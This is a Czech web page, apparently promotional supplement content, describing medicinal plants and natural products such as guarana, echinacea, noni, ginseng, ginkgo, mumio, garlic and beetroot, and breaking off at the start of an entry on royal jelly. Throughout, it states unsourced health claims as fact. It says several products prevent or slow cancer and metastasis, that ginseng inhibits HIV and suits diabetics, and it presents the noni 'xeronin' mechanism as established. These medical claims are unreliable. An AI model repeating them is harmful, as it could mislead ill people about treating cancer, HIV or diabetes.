Nápověda


Nevíte si s něčím rady? Kontaktujte nás, rádi Vám pomůžeme.

 
 

Rostliny a ostatní

Hlasovat Hlasovat Hlasovat Hlasovat Hlasovat
1 45

Mnohé rostliny mají výrazný efekt na zdraví i vitalitu člověka. Je možné je označit jako adaptogeny, dále pak jsou to stimulanty a rostliny posilující imunitní systém.

Pomáhají organismu vyrovnat se s nepříznivými podmínkami, ve kterých žijeme – znečištění, záření aj., dokáží zvyšovat vitalitu, odstraňují únavu, pomáhají čelit infekcím.

Guarana - paulinie nápojná

Je dřevnatá liána, která pochází hlavně z jižní Ameriky z Brazílie a Venezuely. Její semena jsou známá jako guarana, mají hořkou a svíravou chuť a jsou ceněná pro obsah guaraninu, kofeinu, theobrominu a theofylinu, které působí energizačně a povzbudivě na nervový systém.

Potlačuje únavu nejen duševní, ale i fyzickou, urychluje i metabolismus a tím i využití tuků a omezení chuti k jídlu. Zlepšuje krevní oběh, je silným antioxidantem odstraňujícím volné radikály. Taktéž odstraňuje průjmy a snižuje bolesti, např. i migrény.

Kofein se z ní uvolňuje postupně, což je výhodnější než u kávy, a zároveň nepřekyseluje žaludek.

 

Užívá se nárazově v době únavy, potřeby zvýšit výkon. Je možné ji používat sušenou a rozemletou – nejčastěji ve formě tablet, ale také přidávat do mléka, jogurtu aj. někdy se i praží a používá se stejně jako káva.

Schizandra čínská – klanopraška

Jedná se o liánu pocházející z Dálného východu, jejíž červené bobulovité plody se již po tisíciletí využívají v čínské medicíně.

Zpracování

Z rostliny se využívá nejen plod, ale také listy, které se využívají na vaření posilujícího čaje.

Plody je možné zpracovat na marmeládu, kompoty, zamrazit či usušit. Vyrábí se také tinktury, vína aj.

Obsah účinných látek

Bobule jsou bohatým zdrojem koenzymu Q, který má značné antioxidační účinky. Obsahují též organické kyseliny (jablečnou, vinnou, jantarovou a citronovou).

Celá rostlina má pak vysoké množství např. vitaminů C, A, E a minerálů, jakými jsou vápník, železo, draslík, síru nebo sodík aj. Dalšími látkami, které je možné najít ve schizandře, jsou sacharidy, glykosidy a flavonoidy.

Účinnými adaptogenními látkami jsou schizandriny nacházející se hlavně v semenech. Jsou to např. gomisin, schizandrin, wuweizisu C, schizanhenol...

Užití

Vliv na lidský organismus je komplexní, ovlivňuje mnoho orgánových soustav. Posiluje odolnost proti stresu a nepříznivým podmínkám, znečištění aj.

Důležitá je její podpora imunitního systému. Zvyšuje počet T-lymfocytů a posiluje fagocytární funkce makrofágů. Ovlivňuje též syntézu cytokinů, tím modulují zánětovou odpověď.

Je prostředkem na zpomalení stárnutí. Její plody jsou důležité k normálnímu růstu a obnově buněk. Zároveň působí proti předčasné degeneraci organismu způsobené volnými radikály. Je silným antioxidantem.

Využívá se i jako prevence nádorového bujení. Zpomaluje mutaci genů stojící za transformacemi buněk, zpomaluje nárůst nádorové hmoty a její metastazování, zvyšuje citlivost nádorových buněk na radiační terapii.

Je také ochránkyní jater, které detoxikuje a regeneruje.

Na nervovou soustavu působí stimulačně, zlepšuje psychické i fyzické výkony, odstraňuje únavu. Pomáhá však také při nespavosti a bolestech hlavy.

Echinacea – třapatka nachová

patří do čeledí hvězdicovitých. Její název pochází z řeckého echinos, což je v překladu ježek. Tento název dostala díky pichlavému středu květenství, které je dokola ozdobené nachovými okvětními lístky. Můžeme říci, že se podobá kopretině. Je to trvalka původem ze severní Ameriky. Původní indiáni hojně využívali její léčebný potenciál a při různých zdravotních problémech kořen žvýkali při léčbě jakýchkoli bolesti. Vyplachovali si ústa odvarem při bolestech zubů, odvary z kořene též přikládaly na rány, bodnutí hmyzem či uštknutí.  Od toho se též přezdívá i „indiánská šiška“. V roce 1850 pak bylo popsáno Giodenem Lincecumou, že tinktura z kořene pomáhá při kašli a žaludečních obtížích.

Dorůstá výška až 120 cm.

Zpracování

Je využívána jako dekorativní rostlina, ale hlavně jako prostředek na podporu zdraví. Zpracovává se její list, květ i kořen. Nejčastěji se setkáváme s alkoholovými výluhy – tinkturami, ale také sirupy, šťávami aj.

Obsah účinných látek

Je bohatá na mnohé látky tělu prospěšné - třísloviny, steroly, flavonoidy, insulin, polysacharidy a glykoproteiny, vyšší mastné kyseliny - palmitová a linolová, fenolické látky - kyselina  kávová a  její  deriváty, estery kyseliny kávové s cukry – echinakosid, enzymy, minerální látky, v malém množství pyrrolizidinové  alkaloidy  tussilagin a isotussilagin.

Užití

Používá se vnitřně i zevně – zvyšuje obranyschopnost schopnost, tedy posiluje imunitní systém. Napomáhá rychlejší regeneraci a rekonvalescenci po infekčních nemocech. Výrazně podporuje fagocytózu, zvyšuje uvolňování prozánětlivých látek, zvyšuje mobilitu leukocytů, zvyšuje počet lymfocytů, a tím např. lepší boj proti baktériím – stafylokokům a streptokokům. Přímo působí i proti bakteriím a kvasinkám, což zajišťuje echinakosid, přírodní antibiotikum. Má i přímé protivirotické účinky proti viru chřipky a oparu díky derivátům kyseliny kávové. Je také ochránkyní kyseliny hyaluronové proti hyaluronidáze, jíž produkují bakterie. Tím pomáhá udržet ve zdraví bariérové obranné mechanismy – kůži, sliznice, čímž znesnadňuje průnik patogenů do těla.

Je tedy využívána jako podpůrný prostředek pro léčbu nachlazení, infekcí horních cest dýchacích, ale také močových cest. Zmírňuje žaludeční obtíže – křeče, žaludeční vředy. Zevně pomáhá léčit rány, popáleniny, používá se i na ekzematickou pokožku.

Rakytník řešetlákový

Je velmi odolný trnitý keř, který může dorůstat i do výšky 6 metrů: nejčastěji však dosahuje výšky 2 metrů. Patří mezi rostliny dvoudomé. Jeho domovinou severovýchodní Asie Rusko, Mongolsko, Čína. Plodem je kulovitá až oválná žlutě oranžová peckovice.

Obsah účinných látek

Je bohatou zásobárnou mnoha vitamínů A a karotenoidy - beta karoten, lykopen, zaxantin, B, C, kterého má až 10 krát více než citrusy, D, F, K a skupiny B, obsahuje i aminokyseliny, pektiny, třísloviny, organické kyseliny, rutin, minerály - vápník, hořčík, železo, silice, flavonoidy – kvercetin, i oleje a to jek v dužině, tak v pecce.

Velmi důležitý je pak hippophein, což je alkaloid, který se v těle přeměňuje na serotonin.  Zásadní je také obsah alkaloidu hippopheinu, který se v těle přeměňuje na serotonin, který pozitivně ovlivňuje nervovou soustavu, působí jako antidepresivum i protinárodově.

Užití

Díky obsahu mnoha látek je rakytník považovaná za biogenní stimulátor. Posiluje odolnost organismu proti nachlazení a infekcím, stejně tak i stresu. Její účinky jsou i protisklerotické, snižuje hladinu cholesterolu – ochraňuje srdečně cévní systém, hojivě působí na sliznice dýchacích cest i trávicího traktu. Příznivě působí i na játra, slinivku. Je vhodný jako podpůrný prostředek při léčbě žaludečních vředů, zvyšuje produkci trávicích enzymů aj. Stimuluje krvetvorbu a má antibakteriální účinky. Má své využití i v kosmetickém průmyslu. Má hojivé a uklidňující účinky – používá se na ekzematickou pokožku, rány, odřeniny, vrásky, popáleniny.

Zpracování

Z rakytníku lze pro léčebné účely využít všechny jeho části.

Nejvíce se však používají plody – je z nich lisován olej

Je možné zpracovat je na marmeládu/džem, sirupy, šťávy, tinktury, likéry, tablety - tobolky, krémy aj.

Lze plody i usušit a používat na přípravu čaje nebo rozemlít a užívat.

Černý kmín - černucha setá

Je asi 35 cm vysoká letnička, jejímiž plody jsou tobolky s drsnými, tmavě hnědými až načernalými semeny.

Zmínky o používání semen černého kmínu jsou již ze starého Egypta. Semena byla nalezena v Tutanchamonově hrobce a olej získaný ze semen používala i Kleopatra a byl nazýván zlatem faraonů. Ve svém díle ho zmiňuje i slavný Avicena, stejně tak Hippokrates, Paracelsus aj. Je znám v ajurvédě i čínské medicíně.

Zpracování a obsah účinných látek

Z rostliny se zpracovávají nejvíce právě semena, a to v podobě odvaru, rozemletá na prášek, hlavně je to však olej za studena lisovaný. Olej je bohatý na mnoho pro zdraví organismu důležité látky, mezi ně vitamíny: A, B1, B2, B3, B6, kyselina listová, D, E a F, mnoho minerálů a stopových prvků např. Ca, Mg, Fe, Zn, P, Cu. K dalším kladům patří i obsah mastných nenasycených kyselin omega 3 a 6 - kyselinu linolovou, linolenovou, olejovou, myristovou a stearovou, dále pak obsahuje i lykosid melanthin, silice, třísloviny a alkaloid nigellin, damascenin.

Užití

Vzhledem k široké paletě účinných látek se není čemu divit, že i jeho vliv na zdraví je komplexní.

Působí proti plísním bakteriím i virům – je tedy vhodný při léčbě rýmy, kašle. Od infekcí pomáhá i trávicímu traktu a používá se i proti střevním parazitům.

Podporuje imunitní systém, výrazně pomáhá při alergiích.

Ulevuje při zažívacích obtížích, jako jsou křeče v žaludku, podporuje trávení, má pozitivní vliv na žlučník, játra a slinivku, posiluje produkci trávicích enzymů a šťáv. Tím působí i proti nadýmání.

Pomáhá i u menstruačních bolestí a stimuluje laktaci u těhotných.

Má blahodárný vliv i na pokožku – na rány, ekzémy, lupénku

Urychluje rekonvalescenci po nemocech, působí preventivně proti rozvoji nádorového bujení.

I naše klouby jsou jím ovlivněné – pomáhá ulevit od bolestí kloubů, svalů i úponů.

Ovlivňuje i psychiku, bolesti hlavy a migrénu.

Tím ovšem výčet nekončí, dalšími orgány, kterým pomáhá, jsou ledviny a celé močové cesty – působí močopudně, srdce, kdy snižuje hladinu cholesterolu a tím chrání srdce a cévy před rozvojem aterosklerózy.

Běžně se doporučuje užívat 1-4 lžičky oleje denně. Ale je potřeba sledovat doporučení výrobce.


Eleuterokok ostnitý – sibiřský žen šen - čertův kořen

Pochází z Ruska, ze Sibiře, jeho výskyt je ale i v Číně, kde se dle dochovaných údajů používá už více než 5000 let, Korey, Japonsku Je keřem, který dorůstá výšky cca 2 metry. Má bohatě rozvětvený povrchově uložený kořenový systém. Kořeny jsou hodně tenké, ale mohou být i 30 metrů dlouhé.

Obsah účinných látek

Kořeny a listy obsahují množství lipidů, silic, pryskyřic, flavonoidů, sacharidů a glykosidů – eleutherosid B1, C, D, E aj., deriváty kyseliny benzoové, taktéž jsou bohaté na minerální látky např. draslík, fosfor, vápník.

Působení na zdraví

Patří mezi adaptogeny, tj. pomáhá obnovovat energii,

Má povzbuzující účinky, celkově podporuje zdraví, zlepšuje paměť atd. Stimuluje žlázy s vnitřní sekrecí. Snižuje hladinu cholesterolu. Ochraňuje tak srdce, pomáhá upravovat krevní tlak, pomáhá hospodařit s glukózou, snižuje její hladinu v krvi a zvyšuje její zásobní formu – glykogen. Stimuluje centrální nervovou soustavu, má i antidepresivní účinky. Působí stimulačně na imunitní systém a posiluje jeho protivirovou i protibakteriální aktivitu. Bojuje však také proti rozvoji rakovinného bujení, omezuje metastazování. Snižuje toxicitu některých látek a tím jejich negativní dopady na lidské zdraví např. u chemoterapie. Celkově posiluje organismus, je vhodný v době rekonvalescence, u pooperačních stavů atd.

Zevně je možné použít eleuterokok na pokožku postiženou ekzémy, lupénkou, či poraněním.

Nedoporučuje se používat u spánkové apnoe, v těhotenství a době kojení, narkolepsii atd.

 Zpracování

Nejčastěji se používá jako lihový extrakt z kořenů, listů nebo plodů, lze také připravit odvar ze sušeného kořene a pít jej. Dále je možné připravit mast.

Využívá se hlavně kořen, ale léčebné účinky má celá rostlina.

Maralí kořen - leuzea - parcha saflorová

Patří mezi vytrvalé rostliny pocházející z oblasti Sibiře, Kazachstánu a Mongolska. Dorůstá výšky asi 1 metr a dokáže přestát i velké mrazy. Svůj název má od druhu jelena marala, jenž vyhrabává kořeny ze země v době říje. Řadí se mezi adaptogeny.

Nejčastěji je zpracováván do podoby lihových tinktur. Využívá se kořen, ale lze použít také listy.

Obsah účinných látek

Nejdůležitější je obsah ekdysteroidů – ekdysteronu a inokosteronu. Jedná se o steroly s charakterem testosteronu, mají anabolický efekt. Pomáhají začlenit bílkoviny do svalů a podporuje tak jejích nárůst. Dále obsahuje i  polypodiny, flavonoidy, polyacetyleny, deriváty thiofenu, silice, třísloviny, pryskyřice, kumariny. Z minerálů jsou zastoupeny vápník, fosfor, draslík a další prvky. Z vitamínů pak hlavně vitamín C a provitamín A.

Působení na zdraví

Jako adaptogen zvyšuje vitalitu, fyzickou výkonnost, snižuje únavu. Je možné použít ho při chronickém únavovém syndromu. Urychluje rekonvalescenci po nemoci.

Zvyšuje syntézu zásobního glykogenu v játrech a srdci. Mírně zvyšuje krevní tlak.

Působí protektivně na játra i srdce.

Je také podpůrným prostředkem při trávení a nechutenství.

Je využívám i jako afrodisiakum.

Ze semen rostliny byl izolován N-feruloylserotonin, který harmonizuje funkci nervové soustavy a zlepšuje psychiku i schopnost učení.

Zvyšuje zásobení mozku kyslíkem, snižuje bolesti hlavy a odstraňuje poruchy spánku.

Posiluje imunitní systém, pomáhá při doléčování mononukleózy, boreliózy aj.

Je vhodný i jako podpůrný prostředek při terapii a doléčování stavů po rakovině.

Ovlivňuje metabolismus tuků – cholesterolu, jehož hladinu snižuje.

Noni – morinda citrifiola

Je keř rozšířený na Tahiti, Havaji, Fidži, v Panamě a Jihovýchodní Asii, ze které také pochází. Nejstarší zmínka o ní je v indických ajurvédských textech. V přírodě dorůstá výšky kolem 9 metrů. Plodem oni jsou malé peckovičky žlutozelené barvy veliké asi jako slepičí vejce. Vnitřek plodu tvoří sklovitě bílá dužina, která se pak zpracovává. Vyrábí se z ní šťáva – džus.

Zpracování

Výroba probíhá neobvyklým způsobem. Zralé ovoce se nasype do velkých kontejnerů, kde měkne a uvolňuje šťávu. Díky obsahu látek, které mají protibakteriální a hlavně protiplísňové – protikvasinkové, se šťáva vyteklá z plodů nekazí a nekvasí. Následně se šťáva přecedí a nalije do lahví.

Užívá se v malých dávkách, ředěná s vodou. Aby mohly účinné látky fungovat v těle co nejlépe, je doporučováno užívat tuto šťávu na lačno.

Dále je možné užívat sušenou dužinu – samostatně nebo naředěnou.

Aby se dosáhlo viditelných účinků, je zapotřebí dlouhodobější užívání.

Obsah účinných látek

Obsahuje velké množství vitamínů (hlavně vitamín C, E, B2, B6, B12), minerálních látek (sodík, draslík, hořčík, železo), enzymů, rostlinných olejů, 18 aminokyselin, látky jako morindon, morindin, akubin, L- sperulosid, alazarin, kapron, kyselina kaprylová, scopolenin, či damnacanthal - látka, jež ničí určité předrakovinné a rakovinové buňky, stigmasteryl - látka, která brání degeneraci tkání.

Nejhodnotnější látkou je pak proxeronin. Je nepostradatelný pro tvorbu alkaloidu xeroninu. Xeronin plní mnoho důležitých funkcí. Reguluje propustnost buněčných membrán, a tak ovlivňuje funkci buněk. Zasahuje do vstřebávání živin. Buňky jsou lépe vyživovány, tkáně regenerovány, ale také chráněny před napadením bakteriemi a plísní.

Scopoletin dokáže stimulovat vlastní tvorbu melatoninu a serotoninu. Tyto látky mohou stabilizovat nálady, působí antidepresivně, regulují cyklus noc- den. Má i protikřečové účinky a snižuje krevní tlak.

Působení na zdraví

Vzhledem k velkému množství účinných látek, které se v Noni nacházejí je i spektrum potíží, u kterých pomáhá, velmi široké.

Snižuje krevní tlak, předchází vzniku krevních sraženin a tím infarktu a mrtvici.

Stimuluje funkce imunitního systému v boji proti mikroorganismům, plísním aj. Je vhodná k ovlivnění a snížení alergické reaktivity. Ulevuje od artritických bolestí.

Podporuje tvorbu inzulínu a reguluje tak hladinu cukru v krvi. Účinně bojuje s výkyvy nálad a depresemi. Je ochranným prvek proti vzniku rakovinných bujení. Léčí a regeneruje kožní kryt, pokud se kůže potírá olejem z Noni. Je samozřejmě také účinný při problémech s trávicí soustavou, zklidňuje podrážděné sliznice, upravuje zácpu i průjem.

Žen šen

Název rostliny vychází z čínských slov džen- člověk a šen - kořen. Existuje mnoho druhů této rostliny – korejský, sibiřský žen šen aj.

Obsah účinných látek

Žen sen obsahuje řadu aktivních látek svědčících zdraví, jsou to např. uhlohydráty- škrob a polysacharidy, vitamíny skupiny B, glukózu, fruktózu, celulózu a hlavně glykosidy - panaxosidy / ginsenosidy (panaxatriol, panaxadiol, panoquilon, panazin, ginsenin, protopanaxadiol, …)

Působení na zdraví

Patří mezi adaptogeny, harmonizuje organismus v zátěžových stavech, nepříznivých podmínkách i v nemoci. Zmírňuje stres a vyčerpání, zvyšuje fyzickou i duševní výkonnost a odolnost, zpomaluje stárnutí díky neutralizaci volných radikálů.

Má protirakovinné účinky díky látkám prositol a panax. Stimuluje totiž imunitní systém, který si pak lépe poradí s nádorově změněnými buňkami, současně i zpomaluje a zastavuje růst nádorových buněk, tím samozřejmě i jejich množení a metastazování.

Ovlivňuje srdečně cévní systém. Snižuje krevní tlak a rozvoj aterosklerózy. Dokáže totiž snižovat hladinu cholesterolu v krvi a zvyšuje hladinu tzv. hodného HDL cholesterolu.

Reguluje hladinu cukru v krvi a je proto prospěšný u diabetiků.

Trávicí systém je také pozitivně ovlivňován žen šenem.  Je prokázáno, že zvyšuje regenerační schopnost jater, redukuje ztrátu jaterních buněk při otravách. Při onemocnění žaludku posiluje sliznici, která pak dokáže odolat negativním vlivům v podobě špatné potravy, znečištění prostředí aj.

Pomáhá taktéž u anémie, pomáhá regenerovat kostní dřeň např. po radiaci, chemoterapii atd.

V případě nervové soustavy podporuje syntézu neurotransmitérů, zlepšuje mozkové funkce, zvyšuje koncentraci, zlepšuje paměť, posiluje kognitivní funkce, zpomaluje nástup únavy.

Je taktéž velkou podporou hormonálnímu systému, hlavně nadledvinkám. Glykosidy ženšenu, působí preventivně proti hypertrofii, jako důsledku nadměrné stresové zátěže. Reguluje tvorbu kortikosteroidů. 

Imunitnímu systému je nápomocen v boji proti virovým a bakteriálním chorobám. Působí na mikroorganismy přímo (inhibuje např. virus HIV či virus herpetický) a zároveň stimuluje imunitní systém

Povzbuzuje sexualitu, je zařazován mezi afrodisiaka, ovlivňuje totiž syntézu pohlavních hormonů.

Zpracování

Používá se hlavně v podobě sušeného extraktu v tabletách, kdy se doporučuje denní dávka 200-600 mg rozdělená během dne. Lze jej také zakoupit ve formě koncentrátů, čajů či čerstvého kořene.

Ginkgo - jinan dvoulaločný

Jinan dvoulaločný je mohutný strom, který může dorůst až výška 40 metrů. Pochází z východní Asie. Ačkoli vypadá jako listnatý strom, patří do třídy jehličnatých. Je typický svými plochými klínovitými listy s vějířovou žilnatinou. List je rozdělen zářezem na dvě půlky.

Obsah účinných látek

Ginkgo je ceněný pro obsah mnoha účinných látek, jakými jsou např. terpentýny – bilobalid, ginkgolid, flavonoidy – bilobetin, amentoflavon, sekvoiaflavon, kamferol, kvercetin, ginkgetin…, karboxylové kyseliny - 6-hydroxykynurenová, vitamínů – hlavně vitamín A, B, C i minerály - vápník, fosfor, železo

Působení na zdraví

Ginkgo je nejvíce znám ve spojitosti s prokrvením organismu. Zlepšené prokrvení mozku – větší přísun živin a kyslíku - je pak zodpovědné za zlepšení mozkových funkcí, pomáhá bojovat se zapomnětlivostí, působí proti zhoršování rozumových schopností, které souvisí se stárnutím. Je prospěšný také u závratí, hučení v uších atd.

Pomáhá také proti tzv. studeným rukám a nohám. Vzhledem k tomu, že pomáhá rozšiřovat cévy je vhodný také při kardiovaskulárních onemocněních.

Je nutné také zmínit jeho antioxidační schopnosti, kdy neutralizuje volné radikály stojící za degenerací tkání. Je vhodný také pro diabetiky, napomáhá totiž využití glukózy. Lze jím také zlepšit stavy spojené s poruchou funkcí jater a ledvin.

Zpracování

Je vhodné dlouhodobé užívání. Denní dávka je 200 mg suchého extraktu – kapsle, tablety. Je také možné používat ve formě alkoholové tinktury aj.

Acerola – barbadoská třešeň (acerola lysá)

Je rozšířená v oblasti subtropické a tropické Ameriky a Karibiku. Existuje asi 40 druhů. Patří mezi stálezelené keře nebo nízké stromy. Dává oranžové až červené plody, kterými jsou kulovité dužnaté peckovice se 2 – 3 semeny. Pro tyto plody se pěstuje např. acerola lysá.

Obsah účinných látek

Jsou ceněny hlavně kvůli vysokému obsahu vitamínu C, který převyšuje až 30krát jeho obsah v pomerančích a 10x množství vitamínu C v černém rybízu. Krom vitamínu C obsahují acerola i vitamín A, thiamin (B1), riboflavin (B2) a niacin, vitamín E, minerály jako např. draslík, hořčík, zinek, vápník, železo, měď, fosfor. Dalšími látkami jsou glukóza, fruktóza, sacharóza a bioflavonoidy, rutin.

Zpracování

Zralé plody se suší a rozemílají na prášek, tento se váže na nosič, který mu dává stabilitu, aby nedošlo k zoxidování a ztrátě vitamínů.

Působení na zdraví

Vitamín C je silným antioxidačním činidle neutralizujícím volné radikály, je také potřebný pro imunitní systém, zvláště pak v době zvýšeného výskytu infekčních nemocí – podzim, zima, syntézu kolagenu – zdravé šlachy, vazy, dásně, zpomaluje stárnutí pokožky.

Dodává energii, podporuje tvorbu červených krvinek, snižuje krevní tlak.

Aloe vera

Aloe je sukulentní suchomilná rostlina s tučnými dužnatými listy, jejichž okraje jsou zubaté. Právě v těchto listech se nachází velmi dužina, která má léčivé vlastnosti.

Zpracování

Vyrábí se šťáva nebo gel, který se dá sušit. Dužinu listů lze také kompotovat.

Obsah účinných látek

Ale vera obsahuje velké množství pro zdraví prospěšných látek, patří mezi ně např.

Aminokyseliny, enzymy jako lipáza, amyláza, oxidáza, kataláza, celulóza, která pomáhá trávení a urychluje metabolismus. Vitamíny – celá skupina vitamínu B, kyselina listová, vitamín A, vitamín C. je bohatá též na minerály - vápník, draslík, hořčík, fosfor, sodík, železo, mangan, chrom aj. Je zdrojem přírodní kyseliny salicylové, protizánětlivé látky beta – sitosterolu a campesterolu, fenolů, kyseliny skořicové, antrachinonů, saponinů, mukopolysacharidů, acemananu atd.

Působení na zdraví

Je možné ji používat vnitřně i zevně.

Podporuje imunitní systém a jeho obranné reakce. Antrachinony mají antivirové a antibakteriální účinky (opary, angíny). Stimuluje též imunitní odezvu v případě nádorového bujení.

Snižuje záněty a bolestivost např. u kloubních onemocnění.

Je vhodná při trávicích obtížích, odstraňuje zácpu, léčí zánětlivé choroby střev a průjmy, pomáhá detoxikovat střeva. Zmírňuje pálení žáhy, tedy překyselení žaludku. Podporuje jaterní funkce a zlepšuje látkovou výměnu.

Snižuje alergické reakce, mírní atopický ekzém.

Pomáhá udržovat hladinu cukru v krvi, což je důležité pro diabetiky.

Zlepšuje celkovou kondici, včetně mozkových funkcí.

Vnější použití je možné na popáleniny, kožní defekty spojené s cukrovkou, suchou pokožku, lupy, akné aj.

 

Arónie – temnolodec (jeřáb černý)

Je nízký keř nebo stromek, který pochází ze severní Ameriky a dorůstá 2-3 metry. Jeho plody jsou drobné malvičky, které mají sladko-kyselou až natrpklou chuť.

Zpracování

Z bobulí se  získává zdraví prospěšná šťáva nebo se plody suší, používají takto nebo drcené. Je možné je zamrazit, zpracovat na kompot, džem, želé. Je ji možné užívat i syrovou

Obsah účinných látek

Plody arónie jsou bohaté na vitamín C, karoteny, vitamíny PP, B2, B9, ale také na bioflavonoidy např. rutin, cukry, antokyany, pektinové látky, třísloviny, fenolové sloučeniny, kyselinu sorbovou, minerály – vápník, železo, jód aj.

Působení na zdraví

Řadí se mezi tzv. malé adaptogeny.

Stimuluje a posiluje obrannou funkci imunitního systému díky vysokému množství vitamínu C a bioflavonoidů. Je tady vhodná v době virových a bakteriálních infekcí. Snižuje záněty a bolesti.

Dále také zlepšuje stav cév, zvyšuje jejich pevnost. Je možné použít ji ke snižování krevního tlaku, působí antiskleroticky.

Používá se i gastritid.

Je prospěšná díky obsahu jódu štítné žláze.

Pozitivně též působí na psychiku, pomáhá čelist stresu, snižuje emocionální výkyvy.

Detoxikuje organismus.

 Hlíva ústřičná

Patří mezi dřevokazné houby, které rostou hlavně na listnatých stromech. Pochází z Číny a je hojně rozšířená po celém světě.

Obsah účinných látek

Je bohatá na vitamíny řady B a vitaminy D, C, K. Obsahuje též minerály a stopové prvky jako jsou železo, draslík, fosfor, sodík, zinek, selen, bór, jód. Dalšími látkami jsou mevinolin, enzymy, steroly, aminokyseliny i mastné kyseliny, cukry – aldity, monosacharidy, ale také polysacharidy nerozpustné – vlákninu – chitin, chitosan.

Snad nejdůležitější je pak obsah polysacharidu beta 1,3-D glukanu.

Zpracování

Vykytuje se v podobě sušené – prášek, ale také výtažky, tinktury. Je ji možné konzumovat i v čerstvém stavu v kuchyni.

Působení na zdraví

Hlíva má prokazatelný vliv na regeneraci jater, detoxikuje střevo a tím i celý organismus. Snižuje hladinu tuků, cholesterolu a tím chrání srdečně cévní systém a reguluje krevní tlak.

Reguluje též hladinu cukru

Její účinky jsou i protirakovinné – působí jako prevence vzniku, když už rakovina je, dokáže zpomalit její postup a zhoršení stavu. Pomáhá u doléčování.

Působí na imunitní systém, stimuluje ho, aktivuje a posiluje při obraně proti virům, bakteriím a dalším patogenům.

Mumio (chránící tělo před nemocemi) -  horská pryskyřice

Jeho nalezištěm jsou vysokohorské oblasti v Asii, např. Kavkaz, Altaj, ale jsou to i čínská pohoří. V Rusku se hojně využívá v tamním tradičním léčitelství. Sbírá se v jeskyních a skalních průrvách ve výškách nad 3000 metrů. Svým tvarem připomíná slzy. Pokud je očištěno, má od světle hnědé až po temně černou barvu a konzistenci podobnou asfaltu. Povrch je hladký a leskly. Je možné jej snadno rozpustit ve vodě.

Stále není jasné, zda je organickou nebo anorganickou látkou.

Obsah účinných látek

Je bohatým zdrojem mnoho zdraví prospěšných látek. Jsou jimi např. stopové prvky - kobalt, mangan, selen, molybden, minerály - fosfor, vápník, sodík, draslík, železo, měď, hořčík, aminokyseliny - arginin, fenylalanin, methionin, fosfolipidy, vitamíny skupiny B, éterické oleje, organické kyseliny - benzoová…

Obsahuje i malé množství včelího jedu, tudíž se mu musí vyhýbat lidé na něj alergičtí.

Působení na zdraví

 Je možné ho zařadit mezi adaptogeny. Podporuje celkové zdraví, pomáhá vypořádat se tělu s nepříznivými podmínkami, znečištěním i stresem. Urychluje hojení a rekonvalescenci, např. při stavech po zlomeninách kosti. Je výraznou podporou imunitního systému v boji proti infekcím – mírní bolest v krku, kašel, rýmu. Je možné ho použít u bolestí v ústní dutině – paradontóze, bolení zubů. Stimuluje centrální nervový systém a zlepšuje tak paměť, soustředění atd.

Je možné jej použít pro úlevu při alergiích a astmatu.

Trávicí soustavu zklidňuje a tonizuje. Je vhodným doplňkem při jaterních a žlučníkových problémech. Podporuje tvorbu žluči. Mírní žaludeční obtíže, záněty střev, zlepšuje trávení.

Lze jej také použít ke zlepšení průběhu cukrovky.

Nelze opomenout zmínit také vliv na srdce a cévy. Podporuje regeneraci srdce po epizodách nedokrevnosti.

Při zevním používání se aplikuje na poranění, odřeniny, kožní defekty, popáleniny - regeneruje pokožku.

Česnek - Allium sativum

Používá se v lékařství a léčitelství již přes 5000 let. Řekové jej nazývali páchnoucí růže.

Obsah účinných látek

Obsahuje vitamíny jako např. A, B1, B2, B6, C, E, z minerálů pak např. vápník, jód a selen. Další biologicky účinné látky jsou steroidní glykosidy, lektiny, prostaglandiny, fruktan, pektin, adenosin, kyselina nikotinová, anthokyaniny.

Důležitý je allicin.

Působení na zdraví

Česnek je považován za přírodní antibiotikum, má antivirové, antibakteriální a protizánětové účinky. Tím chrání organismus proti infekcím dýchacích cest – při bolestech v krku, zvětšených uzlinách, angínách. Usnadní vykašlávání hlenu, ulevuje od kašle. Urychluje regeneraci po nemoci. Dokáže zabíjet škodlivé střevní bakterie i parazity bez poškození přirozené mikroflóry. Pravidelná konzumace pak snižuje riziko rozvoje nádorového bujení – rakoviny žaludku, tlustého střeva aj.

Při vnějším použití pomáhá odstraňovat bradavice, odpuzuje klíšťata.

Užívání

Česnek lze přijímat v syrové podobě, jako přídavek do jídel při vaření, sušený, naložený v oleji. Ale také v podobě tablet či olejových kapslí, lihových tinktur atd.

U citlivých osob může vyvolat podráždění trávicího ústrojí. V takových případech je lépe jíst česnek tepelně upravený.

Červená řepa

Pochází z oblasti Středomoří a je jedním ze zástupců skupiny kořenová zelenina. Je známá svými účinky na zdraví již od dob starověké Babylónie. Lze používat její bulvy, ale i mladé listy.

Je ji možné konzumovat syrovou např. přidávanou do zeleninových salátů, lisovat z ní šťávu, používat v teplé  kuchyni, zavařovat atd.

Obsah účinných látek

Obsahuje řadu vitamínů B, C, E, betakarotenu, kyselinu listovou, minerálních látek - vápník, hořčík, železo, sodík, draslík, křemík, selen a dále také bílkoviny, cukry, vlákninu, která zpomaluje vyprazdňování žaludku a zvyšuje pocit sytosti.

Nejdůležitější účinné látky

Betacyanin – je druhem barviva, který dává řepě její typickou temně červenou až fialovou barvu. Tato látka je známí svými protirakovinnými účinky. Působí také jako silný antioxidant, který odstraňuje volné radikály z těla. Je taktéž stimulantem imunitního systému.

Betain – je látkou, která působí proti vzniku a rozvoji aterosklerózy, navíc podporuje činnost jater. Je vychytávačem homocysteinu, jejíž působení je spojováno s mnohými degenerativními nemocemi, včetně nádorových.

Vliv na zdraví

Část byla zmíněná již výše.

Důležitým aspektem je, že působí zásaditě.

Má schopnost redukovat viry, bakterie i houby.

Obsah vlákniny zajišťuje pomalejší vyprazdňování žaludku a má tak sytící efekt, naproti tomu urychluje trávení a vyměšování. Působí tedy proti zácpě a detoxikuje organismus.

Kyselina listové má vliv na krvetvorbu, ale také na správný vývoj plodu, hlavně jeho mozku. Podobně tak obsah železa.

Dokáže snížit krevní tlak, zvýšit výkonnost.

Má diuretický efekt – je močopudná, i tím pomáhá k detoxikaci a vyloučení škodlivin z těla.

Dodává zdravý vzhled vlasům a nehtům, což zajišťuje hlavně křemík.

Harmonizuje psychiku.

Dodává pružnost a lesk pleti, vlasům a nehtům.

Zpevňuje cévy a vrací jim jejich elasticitu.

 

Obezřetní při konzumaci červené řepy by měli být diabetici, řepa obsahuje relativně vysoké množství cukrů, a lidé trpící močovými kameny. 

Mateří kašička

Mateří kašička je produkována hltanovými žlázami dělnic, které se živí pylem. Je využívána ke krmení larev dělnic, to pouze po první tři dny života, larev budoucích matek, kterou jsou jí krmeny po celé larvální stádium, matky po celý její život. V době hojnosti se jí krmí i trubci.

